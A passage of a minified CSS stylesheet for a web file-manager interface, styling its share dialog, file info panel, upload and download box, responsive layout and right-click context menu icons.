5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.ztree{margin:0px;padding:10px 0px;font-size:1em;}.ztree 